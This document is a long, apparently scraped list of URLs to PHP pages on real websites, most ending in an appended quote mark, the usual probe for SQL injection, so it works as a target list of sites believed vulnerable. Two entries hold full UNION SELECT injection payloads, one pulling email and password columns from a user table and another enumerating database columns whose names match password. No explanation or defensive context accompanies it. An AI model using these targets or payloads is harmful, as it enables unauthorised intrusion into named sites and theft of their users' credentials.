http://lumopro.com/product.php?id=66'

http://www.rogersspecialtysales.ca/show.php?id=18''

http://dinebaltimore.com/review.php?id=115'

http://www.bia2.com/music-review/review.php?id=182'

http://www.worldstylingtt.com/category.php?id=5'

http://spokesrecords.com/releases.php?id=12'

http://www.plusline.org/article.php?id=4695'

http://www.wedding-cake-toppers.com.au/productinfo.php?ID=15'

http://dvdholocaust.com/review.php?id=577'

http://www.laserltd.ps/cat/showimg.php?id=1040'

http://www.abalar.es/ampliar_material.php?id_material=11'

http://www.clicfolio.com/clicfolio/curriculum.php?id=10505'

http://www.fundraisingnetwork.org/cat-Games.php?id=39'

http://www.f4customs.com/videos_pages.php?id=5'

http://bbs.yayu.org/look.php?id=227'

http://www.ngo-monitor.org/article.php?id=1564'

http://www.armorysquareofsyracuse.com/main/shopping.php?id=15'

http://www.elitebicycles.com/athletes_detail.php?id=42'


http://enpi-info.eu/main.php?id=344&id_type=2'


http://www.rentray.nl/over_rentray.php?id=14'

http://games.zbeng.net/game.php?id=2'


http://www.waukee.org/event.php?id=19'

http://www.narkissosshavingoil.com/product/item.php?ID=2'

http://www.themetalcircus.com/review.php?id=3096'

http://www.laserltd.ps/cat/showimg.php?id=85'

http://www.cedec.ca/index.php?id=1'

http://www.maxprotech.com/maxpro-product-detail.php?id=48'

http://www.cam-ceeds.org/event.php?ID=30'

http://www.ferobrake.co.za/productdetail.php?id=19'

http://www.illoomballoon.com/news.php?id=112'

http://www.skbcases.com/music/news/news-detail.php?id=24'

http://www.rec.org/event.php?id=286'

http://www.playdowns.com/nbca/event.php?id_cmp=10'

http://www.selfpp.com/gallery.php?ID=8'

http://tko.sciencenoodle.com/game.php?id=60987'

http://www.dracoders.com/games.php?id=7'

http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=32+'

http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=29+'

http://www.shoppingtang.com/productinfo.php?id=294'

http://www.sealchemistry.co.za/readnews.php?id=10'

http://www.notebookfocus.com/readnews.php?id=343'

http://www.hkyongnuo.com/e-detail.php?ID=241'

http://www.bryansmarine.com/section.php?id=10'

http://hcpoa.com/readnews.php?id=73'

http://mappn.com/game.php?id=11'

http://www.onradio.gr/player.php?id=388'

http://www.vertexlaw.co.uk/news/detail.php?id=000147'

http://www.wildarttaxidermy.co.uk/gallery.php?id=16'

http://www.kudosshowers.co.uk/gallery.php?id=3'


http://www.scotclimb.org.uk/gallery.php?id=3'


http://www.cfnielsen.com/material.php?id=19'

http://ww2.fairfaxtimes.com/cms/story.php?id=1195'

http://www.bernard-vidal.com/view-photo.php?id=75'

http://ww2.fairfaxtimes.com/cms/story.php?id=1050'

http://www.aoamumbai.in/publications.php?id=49'

http://www.infocajeme.com/humor.php?id=12'

http://www.funlandz.com/find_person.php?id=180071'

http://www.gorodokboxing.com/material.php?id=2'

http://www.datamp.org/patents/search/xrefPerson.php?id=6509'

http://www.babycareadvice.com/babycare/general_help/article.php?id=18'

http://kb.calyxsupport.com/kb/article.php?id=308'

http://www.gymka.com/english/detail_produit.php?id=328'

http://www.thefutureisfierce.com/releases.php?ID=49'

http://www.datamp.org/patents/search/xrefPerson.php?id=7413'

http://baywoodbest.com/listingPop.php?Id=620'

http://www.nissi-beach.com/section.php?id=13'

http://evt-me.com/newsDetail.php?id=8'



http://www.istl.com/view-product.php?ID=54'

http://www.fitnessbuildshealth.com/trainers.php?id=88'

http://www.techvision.co.uk/news.php?id=45'

http://www.guruslodge.com/index.php?topic=6484.0'

http://www.fanfics.ru/read.php?id=1515'

http://www.henleystandard.co.uk/news/news.php?id=36113'

http://www.facingthegiants.com/news.php?id=2'

http://www.pioneer-group.co.uk/event.php?id=16'

http://terekon.ru/material.php?id=6'

http://www.chambers.ie/preview.php?id=889'

http://www.yboaofnc.com/event.php?id=3'

http://www.amandala.com.bz/newsadmin/preview.php?id=6926'

http://princesspaper.com/pages/view-product.php?id=2'

http://rec.org/event.php?id=306'

http://www.bombasticlife.com/place/review.php?id=504'

http://www.kingslynnarts.co.uk/whatson_event.php?id=46'

http://www.nowgen.org.uk/facilities/events/event.php?id=30'


http://www.walesdirectory.co.uk/events/event.php?id=2445'


http://www.doggerfisher.com/artists/publications.php?id=47'

https://powertraveller.com/news/detail.php?id=000126'

http://www.prosportsgroup.com/agent-info.php?id=55'

http://www.highlandvillage.org/event.php?id=72'

http://www.edseven.com/item_look.php?id=4'

http://www.nmtf.co.uk/index.php?id_cpg=1'

http://www.minesandcommunities.org/look.php?id=54'


http://infocajeme.com/humor.php?id=38'

http://www.geneticsandsociety.org/article.php?id=282'

http://www.chambers.ie/preview.php?id=932'

http://www.worapongengineering.com/project_pop.php?Id=32'

http://www.twitney.co.uk/theme.php?id=5'

http://www.anchoryachts.com/preview.php?ID=249'

http://www.nsche.org.ng/communiquedetail.php?ID=3'


http://www.feicuidao.com/jqzx_look.php?id=29'

http://www1.kingsborough.edu/sub-other/sub-student/scholarshipdb/pop.php?id=331'

http://www.bonsaitrees.com/gallery.php?id=7'

http://www.amrproductions.nl/faq/view_faq.php?id=7'


http://reallymeansounds.com/events/event.php?id=529'

http://holidayvillagerodos.com/gallery.php?id=1'

http://www.schoolofbhagavadgita.org/shopping.php?id=45'

http://www.ecstasydata.org/view.php?ID=1888'

http://www.pialombardia4.it/newscat.php?id_newscategory=2'

http://www.konceive.com.au/riverside/investAnnounce.php?id=43'


http://www.eventdirect.ca/game.php?ID=62'



http://www.humanrights.uconn.edu/publications.php?id=37'

http://www.sportident.co.uk/full_story.php?id=115'

http://courtnews.co.nz/story.php?id=1912'

http://biclopsgames.com/game.php?id=6'

http://www.humanrights.uconn.edu/publications.php?id=19'

http://apiexchange.com/index_main.php?id=1'

http://www.hotelsayianapa.com/section.php?id=11'

http://www.kipepeo.org/insect-gallery.php?id=58'

http://www.fn-franchecomte.com/communique_detail.php?id=145'

http://www.stonemarket.co.uk/section.php?id=1'

http://www.skywatcher.com/swtinc/product.php?id=30&class1=1&class2=102'

http://www.psychology.org.nz/cms_show_download.php?id=559'


http://www.medix.com.hr/aboutbook.php?id=30'

http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'

http://www.excellentdevelopment.com/news_detail.php?id=136'

http://www.simon-dean.co.uk/motor_news/motor_news_detail.php?ID=35'

http://www.natalpress.com.br/humor.php?id=10627'

http://www.cross.tv/52818?channel_id=1104'

http://www.cbmin.org/cbm/staff?staff_id=10'

http://olympicresidence.com/gallery.php?id=13'

http://www.ath-elite.com.au/trainers.php?id=28'

http://familynewsabout.com/aboutBook.php?id=3241'

http://www.mvsport-tuning.com/viewProduct.php?id=43'

http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'

http://www.avmaniacs.com/review.php?id=1054'


http://byeu.org/photos/viewphoto.php?ID=194'

http://www.cbmin.org/cbm/staff?staff_id=6'

http://www.coastal-koi.com/view_product.php?id=954'

http://www.drummajorinstitute.org/events/unique_event.php?ID=38'


http://www.ldschurchtemples.com/sandiego/gallery/download.php?id=272'

http://www.dvdmaniacs.net/review.php?id=318'

http://www.themarketingsite.com/live/content.php?Item_ID=5925'

http://www.dmgems.co.uk/pages.php?id_sec=15'

http://www.faithinplace.org/news.php?ID=58'

http://www.barcode.md/post.php?id=20'

http://www.sheridan-uk.com/news_detail.php?id=52'

http://www.individualcars.com/inventory/detail.php?ID=685'

http://www.bsp.org.uk/news_full.php?id=31'


http://flatbearconsulting.com/pages.php?id_pag=6'

http://www.girls.njpanthers.com/preview.php?id=25'

http://www.hotproperties-bayarea.com/readnews.php?id=2'


http://www.shxingba.com/product/prodinfo.php?id=62'

http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'

http://inrecs.com/releases.php?id=37'

http://www.planetbollywood.com/displayReview.php?id=m101411095354'

http://techloopreviews.com/review.php?id=89'


http://dailyexhibit.com/theme.php?id=1224 ForceRecrawl: 0'


http://yoga.ge/pages/theme.php?id=109'


http://terekon.ru/material.php?id=1'

http://www.ristorantelarsenale.com/newscat.php?id_newscategory=2'

http://www.thejewishmuseum.org/site/pages/event.php?id=348'

http://www.peterduff.com/main.php?ID=1'

http://www.sagemont.com/class_pages.php?id=940170'

http://www.nutritioncare.net/pages.php?id=12'

http://www.therightdentist.com/profileview.php?id=124859'

http://www.oceansurf.ca/gallery.php?id=16'


http://www.gta-

modding.it/area/index.php?act=view&id=34+...%2F%2Ftrainers.php%3Fid%3D4-

1+union+select+0%2C1%2C2%2Cconcat%28email%2C0x3a%2Cpass%29%2C4%2C5%2C6%

2C7%2C8+f rom+koobi_user'

http://www.craftaustralia.org.au/library/review.php?id=blurring_the_boundaries'

http://www.luimo.org/curriculum.php?id=ST000019'

http://www.djangosolos.com/title.php?id=128'

http://www.kagakribet.com/humor.php?id=157'

http://fitnessbuildshealth.com/trainers.php?id=32'

http://www.portalararuna.com.br/2011/humor.php?id=10'


http://gp.org/speakers/detail.php?ID=42'

http://www.glac.fr/en/produit.php?id=84'


http://www.thefutureisfierce.com/releases.php?ID=25'

http://internal.ccuniversity.edu/ministryjobboard/post.php?ID=5242'

http://www.trailercityportland.com/product.php?id=559'

http://www.valiani.com/computerised_detail.php?ID=1'

http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'

http://www.jocuri-online.net/game.php?id=5'

http://www.4wdsystems.com.au/index.php?id=29'


http://www.amrproductions.nl/faq/view_faq.php?id=8'

http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=29'

http://campus.sanook.com/inlove/read.php?id=86'

http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'

http://www.ianforsythphotographer.com/main.php?id=1'

http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'

http://www.dkggroup.com/newsdetail.php?id=165'


http://www.datraveler.com/main/theme.php?id=214'

http://www.constructionspares.com/main.php?ID=6'

http://www.punp.edu.ph/main.php?id=33'

http://slantmagazine.com/giveaway_detail.php?id=2'

http://shohomes.com/gallery.php?id=10'

http://senl.com/nav/artikel_info.php?id=1388'



http://www.newlife.co.uk/show.php?id=592'

http://www.thecompletepianist.com/material.php?id=7'

https://www.camillushouse.org/news_center/news_detail.php?ID=78'

http://www.liquidafrica.com/newsdetail.php?id=1246'


http://dvdmaniacs.net/review.php?id=974'

http://www.msmedicalsystems.com.br/ecommerce/product_info.php?id_produto=221'

http://www.allnations.net/equipment/prodinfo.php?ID=235'

http://www.neilprydemaui.com/category.php?id=6'

http://www.atitelemetry.com/viewapp.php?id=7'

http://www.dynamicptmichigan.com/news.php?id=22'

http://www.pcofiowa.com/news.php?id=15'

http://www.benlongfineart.com/news.php?id=13'

http://stadiumsportsllc.com/news_view.php?id=20'

http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=747'

http://www.ristorantelarsenale.com/newscat.php?id_newscategory=3'

http://www.galleri-a.no/main.php?id=utstilling&utstillingid=1231337157'

http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=67'

http://www.futuresfins.com/fin-detail.php?id=69'

http://core.materials.ac.uk/search/detail.php?id=1803'

http://wordtheatre.com/events/event.php?id=140'

http://www.pimp-codes.com/preview.php?id=1544'

http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377'

http://www.guitars4you.co.uk/product-detail.php?id=413'


http://www.internationalstudents.org/culture-humor.php?idlv2=39'

http://www.2hgs.com/detail_humor.php?ID=38'


http://www.namcap.net/view_product.php?id=31'

http://www.plagij.at/tran.php?id=1071'

http://www.salon52.ca/academies/curriculum.php?id=174'


http://dailyexhibit.com/theme.php?id=1224'


http://www.sanpantaleo.sardegna.it/shopping.php?ID_STRUTTURA=16'

http://enpi-info.eu/main.php?id=403&id_type=2'

http://mayfairgames.com/game.php?id=212'


http://www.hplus.sk/title.php?id=27'

http://tattoosbybryan.com/showimg.php?id=52'

http://www.runningmyraces.com/event.php?id=1870'

http://www.pialombardia4.it/newscat.php?id_newscategory=3'

http://www.inkprints.com/php/productlist/productitem.php?id=1459'

http://www.wcac.org/show.php?id=1'

http://www.djinsure.com/faq/viewFAQ.php?id=8'

http://www.hypetrading.com/productinfo.php?id=285'

http://greyhenpress.com/news.php?id=4'

http://www.gielighting.com/ang/_produit.php?id_cat=3'

http://www.intech-tunisia.com/ang/produit.php?id_cat1=3&id_cat=1'

http://www.intech-tunisia.com/ang/produit.php?id_cat1=2&id_cat=1'


http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=226'

http://www.medpharma-ae.com/showimg.php?id=160'

http://www.clickautographs.com/detail.php?id=972'

http://www.buzzylinhart.com/news-view.php?id=18'


http://www.ma-maas.nl/prodDetail.php?id_prd=63'

http://www.mygoodact.com/collectiondetailperson.php?id=54'

http://www.sigmaspa.com/web/prod_detail.php?ID=225'

http://www.broderna-anderssons.se/prod_detail.php?id=109'

http://queensfashion-paris.fr/ang/produit.php?id=23'

http://cornthwaites.co.uk/viewproduct.php?id=439&catid=6'

http://www.seanscottphotography.com.au/shop_category.php?id=2'

http://www.webcommerce.insee.fr/fiche-produit.php?id_produit=2327'

http://www.macmahonphoto.fr/produit.php?id=232&table=H%E9liopan'


http://www.busaccagallery.com/item_info.php?id=2756'

http://www.areyoureadytoorder.co.uk/review.php?id=251'

http://www.y2neil.com/reviews/review.php?id=17'

http://www.dellorto.fr/details-produit.php?id_produit=2042'

http://weddingdressmarket.com/info.php?id=7413'

http://www.biclopsgames.com/game.php?id=1'

http://byeu.org/photos/viewphoto.php?ID=189'

http://www.lifedesigns.org/viewproduct.php?id=92'


http://www.medpharma-ae.com/showpost.php?id=68'

http://www.svasweb.org/news.php?id=59'

http://old.brownsvilleherald.com/opinions.php?id=0'

http://www.cupid.biz/support/opinions.php?id=61'

http://www.armorysq.org/main/shopping.php?id=157'

http://www.babycareadvice.com/babycare/general_help/article.php?id=48'

http://ux.brookdalecc.edu/fac/tlc/fac/tlc_blog_post.php?id=11'

http://www.mamalibro.com/pagines/llibre_opinions.php?id=9788434237872'

http://www.caiguoqiang.com/project_detail.php?id=196'

http://www.cometantenna.com/newPro_detail.php?ID=234'

http://perkins.pvt.k12.ma.us/museum/section.php?id=214'

http://wwww.newlife.co.uk/show.php?id=107'

http://www.totemcreation.fr/produits/theme.php?idtheme=797&idrub=100'

http://www.tourisme-boulognesurmer.com/shopping.php?id=36'

http://www.chinafashiontang.com/productinfo.php?id=627'


http://www.emaxxtech.com/view_faq.php?id=44'

http://alliemsalon.com/news_full.php?id=16'

http://www.dracoders.com/games.php?id=14'

http://www.digitaldickens.com/section.php?id=6'

http://www.equality-ne.co.uk/readnews.php?id=3728'


http://www.traikos.us/trends_opinions.php?id=5'


http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265'

http://www.ec21th.com/productinfo.php?id=194'


http://www.hbztrade.com/productinfo.php?id=273'

http://www.macmahonphoto.fr/produit.php?id=196&table=H%C3%A9liopan'

http://www.spraywaysingapore.com/proddetail.php?ID=17'

http://drugandalcoholeducationservices.co.uk/news_detail.php?id=1'

http://propartsllc.com/prodDetail.php?ID=596'

http://www.melbournefineart.com.au/gallery.php?id=18'


http://www.robotech.com/community/forum/messages.php?id=23'

http://www.llangollen-railway.co.uk/event.php?id=80'

http://www.shop-gun.fr/product.php?id_product=510'

http://www.hebron.com/english/gallery.php?id=190'

http://courtnews.co.nz/story.php?id=1660'

http://www.backbiomass.co.uk/newsroom-story.php?id=19'


http://www.srilankatravelcentre.com/pages.php?id=47'

http://ethansreview.com/website.php?id=1'


http://www.austells.net/news/news_full.php?id=35'


http://www.ebambi.com/profile_view.php?id=100000008'

http://www.cabinetglass.com/preview.php?id=352'


http://www.masshist.org/database/doc-viewer.php?item_id=99'

http://www.evene.fr/forum/theme.php?id_theme=13'

http://www.shop-gun.fr/category.php?id_category=13'


http://www.walkamilepeterborough.com/participant.php?id=94'


http://www.prespec-consulting.com/theme/theme.php?id_theme=7'

http://www.eia.org.uk/view.php?id=948'

http://www.rockthewok.com/readnews.php?id=24'

http://www.sghgate.net/productinfo.php?id=627'

http://mikesmit.com/show_post.php?id=1175207880'


http://www.fspacerpg.com/proddetail.php?ID=FSPEB103'

http://www.narkissosshavingoil.com/product/item.php?ID=1'

http://www.oiwsba.com/oiwsba/memberinfo.php?id=54'

http://www.bayareaassn.com/memberinfo.php?id=7'

http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=101'

http://staff-driver.net/page.php?file=vacansys&vacstart=10'

http://www.bengaldens.com/detail_all_post.php?id=78'


http://www.suagacollection.com/photo-gallery.php?id=1'

http://www.srilankatravelcentre.com/pages.php?id=49'


http://www.motorxchange.fr/destockages.php?id_destockage=123'

http://www.gocontempo.com/pages.php?id=2'



http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'

http://www.discoverypartnerships.com/register/curriculum.php?id=44'

http://www.ghnats.org/pages.php?id=2'

http://www.worldmusicinstitute.org/event.php?id=906'

http://wminyc.org/event.php?id=1072'

http://www.arcana.com/view_title.php?id=189'


http://www.canalchat.com/transcript.php?id_alaffiche=1013'

http://www.canalchat.com/transcript.php?id_alaffiche=783'

http://cloneemotorcentre.ie/faq2.php?id=15'

http://komagan.net/readnews.php?id=5'

http://fpchurch.org.uk/News/view.php?id=26'

http://sflcn.com/story.php?id=9826'

http://www.oldtimephotos.org/gallery.php?id=11'

http://www.latintourdimensions.com/overview/product_detail.php?id=352'

http://www.latintourdimensions.com/overview/product_detail.php?id=86'




http://www.uslandandhome.com/detail.php?id=2649'

http://www.ndc.ps/main.php?id=9'

http://www.falltvpreview.com/show.php?id=1037'

http://www.timeref.com/myperson.php?id=1752'

http://www.trumanlibrary.org/photographs/view.php?id=392'

http://perkins.pvt.k12.ma.us/museum/section.php?id=213'

http://ohr.edu/ask_db/ask_main.php?id_number=222'

http://www.torinofilmlab.it/person.php?id=344'

http://www.torinofilmlab.it/person.php?id=338'

http://ce.et.tudelft.nl/person.php?id=926'


http://www.driftsurfing.eu/surf_article.php?id=1880'

http://www.emaxxtech.com/view_faq.php?id=34'


http://www.stonemarket.co.uk/section.php?id=3'

http://www.micronanosystems.co.uk/nano_news_full.php?id=72544'

http://www.brock.ac.uk/news/news/detail.php?id=000178'

http://www.brock.ac.uk/news/news/detail.php?id=000189'

http://www.thedockyard.co.uk/photo_gallery_pop.php?id=43'


http://www.drinksontario.com/memberinfo.php?id=70'

http://www.hebron.com/english/gallery.php?id=170'

http://www.evene.fr/forum/theme.php?id_theme=19'

http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'

http://www.irishart.com/dispgallery.php?id=518'

http://linkinthebox.com/productinfo.php?id=109'

http://www.wall4me.com/uk/page_produit.php?id=16'

http://www.carhs.de/en/company/news/full.php?Id=202'

http://www.austells.net/news/news_full.php?id=30'

http://www.humormillnews.com/hmill/read.php?id=13'

http://lemhiweb.com/news.php?id=36'


http://www.boys.njpanthers.com/preview.php?id=24'

http://www.fasl.ch/activites/tous_annonces_ages.php?idcentre'

http://en.swfplay.net/game.php?id=104'

http://www.gp.org/speakers/detail.php?ID=29'

http://www.polkatheatre.com/event.php?id=43'

http://brml.technion.ac.il/publications.php?id=7'

http://www.gordonsmithguitars.co.uk/products/category.php?id=2'

http://www.18eighty.com/os_view_product.php?id=37'

http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'

http://www.tecnologi.net/wp/curriculum.php?id=237'

http://www.worldstyling.com/web/product_detail.php?id=95'

http://cherokeeguitar.com/product-detail.php?id=16'

http://www.westcliffepublishers.com/detail.php?id=345'

http://www.justcampagne.fr/en/produit.php?id_cat=5'


http://www.theshootinggamepage.com/displaygames.php?id=32'


http://bryanco.com/news_post.php?id=26'

http://weekend.od.ua/news_full.php?id=1531'

http://www.kusuri.co.uk/view_product.php?id=245'

http://www.kusuri.co.uk/view_product.php?id=242'

http://www.charot.com/produit.php?id=20'

http://www.nicolasmarquis.com/site/produit.php?id=%2733'

http://www.indianewsheadlines.com/post.php?id=8006'



http://www.manka-creations.com/AG/produit.php?ID_produits=4'

http://www.carldavey.co.uk/product.php?id=2'

http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=180'

http://www.walkamilepeterborough.com/participant.php?id=95'

http://www.gielighting.com/ang/_produit.php?id_cat=7'

http://www.manka-creations.com/AG/produit.php?ID_produits=28'


http://www.wardrobesystems.co.uk/preview.php?id=365'

http://www.planetbollywood.com/displayArticle.php?id=s011911120004'

http://www.peabody.uga.edu/news/event.php?id=59'

http://snakedancecondos.com/pages.php?id=10'

http://www.zoolyshop.com/productinfo.php?id=201'

http://mx5.brighton-rock.net/BandInfo.php?ID=315'

http://mx5.brighton-rock.net/BandInfo.php?ID=643'

http://www.skbcases.com/industrial/products/prod-detail.php?id=235'

http://elmercadohispano.com/prod_detail.php?ID=284" onclick="sa_mpTC(event, this); return

false;'

http://bulacandeped.org/viewannounce.php?id=4'

http://www.retroinferno.com/viewproduct.php?id=235'



http://brml.technion.ac.il/publications.php?id=6'

http://dufieux-industrie.com/en/fiche_type_produit.php?id=15'

http://www.lindbergbros.com/page/post.php?id=365'


http://bryanco.com/news_post.php?id=23'

http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17'



http://www.amoryssolicitors.com/main.php?ID=1'

http://boxofficebuz.com/news_full.php?id=36'

http://leavenworth.org/modules/pages/index.php?pageid=1'


http://www.greenkettle.co.uk/view.php?id=%277'

http://www.discoverypartnerships.com/register/curriculum.php?id=49'


http://www.merseyfencing.co.uk/section.php?id=Timber-Fence-Panels'

http://www.tanthrough.com/proddetail.php?id=809790'

http://www.inhealthnw.com/story.php?id=143'

http://www.saleemcarpets.com/prod_detail.php?ID=10'

http://kornerstore.net/ks_proddetail.php?ID=180'

http://www.widescreenreview.com/news_detail.php?id=19267'

http://dpanswers.com/roztr/content_show.php?id=86'

http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=71'

http://www.hypetrading.com/productinfo.php?id=491'

http://www.mikesmit.com/show_post.php?id=1141826580'

http://www.charot.com/produit.php?id=13'

http://www.coedllandegla.com/download.php?id=2'


http://ce.et.tudelft.nl/publications.php?id=1755'

http://www.mediflight.com.au/publications.php?id=75'

http://english.euyou.com/shopping.php?id=25&countryid=7'

http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'

http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'

http://www.medix.com.hr/aboutbook.php?id=33'

http://www.australianewsonline.com/post.php?id=9960'

http://www.dundeetrainingstable.com/news-full.php?ID=16'

http://www.actforkids.com.au/news_full.php?id=134'




http://www.youngatheartministries.com/prod_detail.php?id=3'

http://www.communityinclusion.org/staff.php?staff_id=21'

http://www.flyfishinginmaine.com/story.php?id=58'


http://www.retroinferno.com/viewproduct.php?id=700'

http://capeyouthadventures.co.za/main.php?Id=6'

http://www.sflcn.com/story.php?id=6946'


http://www.edwardsymmons.com/pages/news_story.php?id=171'

http://www.alte.org/news/newsitem.php?newsID=209'

http://www.iol.umd.edu/People/person.php?id=tweyrauch'

http://www.cornerstone.org.uk/publications.php?id=newsletters'

http://lucklyinthebox.com/productinfo.php?id=1155'


http://www.coastalengineering.com/staff_pop.php?id=10'

http://www.prespec-consulting.com/theme/theme.php?id_theme=8'


http://www.aspasiabooks.com/News_View.php?ID=37'

http://www.newmasterplanning.com/project_main.php?id=16'

http://www.biblioteca-ua.com/select_biblio.php?id=-

1599+union+select+1%2Cconcat%28table_name%2C0x3a%2Ccolumn_name%2C0x3a%2Ctab

le_sc

hema%29%2C3%2C4%2C5+from+information_schema.columns+where+column_name+LIKE

+CHAR% 2837%2C+112%2C+97%2C+115%2C+37%29--'

http://biblioteca-ua.com/select_biblio.php?id=1599" onclick="sa_mpTC(event, this); return

false;'



http://yoga.ge/pages/theme.php?id=192%E1%83%99%E1%83%90%E1%83%A0%E1%83%9

2%E1%83%98%E1%83%90'

http://www.lawetalnews.com/post.php?id=144'

http://www.nu.edu.bd/noticeInfo.php?id=355'



http://www.anchoryachts.com/preview.php?ID=3'

http://www.tecnologi.net/wp/curriculum.php?id=36'


http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=17'

http://www.f4customs.com/install_pages.php?id=8'

http://www.luimo.org/curriculum.php?id=ST000036'


http://www.thefastshow.com/virtual_show_detail.php?ID=44'

http://boxofficebuz.com/news_full.php?id=57'

http://www.amouage.com/news.php?ID=10'


http://www.indianewsheadlines.com/post.php?id=8049'

http://www.sinclairgroup.com/sinclair_web/person.php?id=104'

http://www.samsungmobilers.ro/post.php?id=143'

http://www.johandemeij.com/post.php?id=223'

http://www.chot.org/pages.php?id=88'


http://riyadhtravel.net/show.php?id=3'

http://iwine.com.hk/product_item.php?id=17'

http://www.dvdholocaust.com/review.php?id=473'

http://computer.ytu.edu.cn/showannounce.php?id=41'


http://www.sinclairgroup.com/sinclair_web/person.php?id=49'

http://arthurpober.com/pages.php?id=15'


http://allnations.net/equipment/prodinfo.php?ID=3'


http://www.towncityrealty.com/info.php?id=25'


http://www.watercampws.uiuc.edu/index.php?menu_item_id=44'

http://www.brighton-rock.net/BandInfo.php?ID=479'

http://www.brighton-rock.net/BandInfo.php?ID=555'

http://www.pokenav.net/blog_post.php?id=1019'

http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=19'

http://capturegis.com/pages.php?id=10'

http://www.saleemcarpets.com/prod_detail.php?ID=57'

http://www.beemabuild.co.uk/view_product.php?id=258'

http://www.coastal-koi.com/view_product.php?id=1393'

http://mapleislandsales.com/product_detail.php?ID=78'

http://www.sigmaspa.com/web/prod_detail.php?ID=216'

http://www.familiscope.ie/main.php?ID=3'

http://biomed.eng.cmu.ac.th/index.php?newsdetail.php&id=63'

http://www.justcampagne.fr/en/produit.php?id_cat=2&id=88&id_coul=12'

http://www.checkersindustrial.com/product.php?id=74'

http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'


http://linkinthebox.com/productinfo.php?id=109'

http://www.guruslodge.com/index.php?topic=6484.0'




http://www.nmtf.co.uk/index.php?id_cpg=1'


http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'



http://www.wellydiecast.com/product_detail.php?id=1070'


http://www.wellydiecast.com/product_detail.php?id=7'




http://www.humormillnews.com/hmill/read.php?id=13'




http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'

http://familynewsabout.com/aboutBook.php?id=3241'

http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'


http://www.traikos.us/trends_opinions.php?id=5'

http://riyadhtravel.net/show.php?id=3'

http://old.brownsvilleherald.com/opinions.php?id=1590'

http://www.zigzagweeklynews.com/opinions.php?ID=6143'

http://www.pcofiowa.com/news.php?id=15'


http://www.faithinplace.org/news.php?ID=58'







http://www.llangollen-railway.co.uk/event.php?id=80'

http://www.fundraisingnetwork.org/cat-Games.php?id=39'

http://www.midlandairmuseum.co.uk/news.php?id=16'


http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'



http://flatbearconsulting.com/pages.php?id_pag=6'



http://capturegis.com/pages.php?id=10'




http://www.familiscope.ie/main.php?ID=3'

http://www.constructionspares.com/main.php?ID=6'

http://www.theshootinggamepage.com/displaygames.php?id=32'

http://www.punp.edu.ph/main.php?id=33'


http://www.westcliffepublishers.com/detail.php?id=345'



http://www.bombasticlife.com/place/review.php?id=504'


http://www.thecompletepianist.com/material.php?id=7'

http://www.digitaldickens.com/section.php?id=6'

http://www.ec21th.com/productinfo.php?id=194'


http://www.hbztrade.com/productinfo.php?id=273'

http://www.kingslynnarts.co.uk/whatson_event.php?id=46'

http://www.sheridan-uk.com/news_detail.php?id=52'



http://lemhiweb.com/news.php?id=36'

http://www.communityinclusion.org/staff.php?staff_id=21'



http://www.falltvpreview.com/show.php?id=1037'


http://dvdmaniacs.net/review.php?id=974'



http://www.amoryssolicitors.com/main.php?ID=1'


http://ethansreview.com/website.php?id=1'


http://www.drinksontario.com/memberinfo.php?id=70'



http://www.thejewishmuseum.org/site/pages/event.php?id=348'

http://www.ngo-monitor.org/article.php?id=1564'

http://wminyc.org/event.php?id=1072'

http://www.abalar.es/ampliar_material.php?id_material=11'

http://stadiumsportsllc.com/news_view.php?id=20'


http://www.worldmusicinstitute.org/event.php?id=906'



http://baywoodbest.com/listingPop.php?Id=620'




http://www.peabody.uga.edu/news/event.php?id=59'

http://www.waukee.org/event.php?id=19'

http://bulacandeped.org/viewannounce.php?id=4'

http://www.tourisme-boulognesurmer.com/shopping.php?id=36'



http://www.portalararuna.com.br/2011/humor.php?id=10'


http://propartsllc.com/prodDetail.php?ID=596'


http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=16'

http://www.equality-ne.co.uk/readnews.php?id=3728'


http://www.medpharma-ae.com/showpost.php?id=68'

http://www.guitars4you.co.uk/product-detail.php?id=413'


http://www.trumanlibrary.org/photographs/view.php?id=392'

http://www.gocontempo.com/pages.php?id=2'



http://www.fanfics.ru/read.php?id=1515'

http://www.dvdmaniacs.net/review.php?id=318'


http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'


http://gp.org/speakers/detail.php?ID=42'


http://www.konceive.com.au/riverside/investAnnounce.php?id=43'



http://www.valiani.com/computerised_detail.php?ID=1'

http://dailyexhibit.com/theme.php?id=1224'

http://www.atitelemetry.com/viewapp.php?id=7'

http://www.oldtimephotos.org/gallery.php?id=11'

http://shohomes.com/gallery.php?id=10'





http://www.justcampagne.fr/en/produit.php?id_cat=5'


http://www.planetbollywood.com/displayReview.php?id=m101411095354'

http://www.alte.org/news/newsitem.php?newsID=209'

http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'

http://www.suagacollection.com/photo-gallery.php?id=1'



https://www.camillushouse.org/news_center/news_detail.php?ID=78'

http://www.liquidafrica.com/newsdetail.php?id=1246'



http://www.planetbollywood.com/displayArticle.php?id=s011911120004'

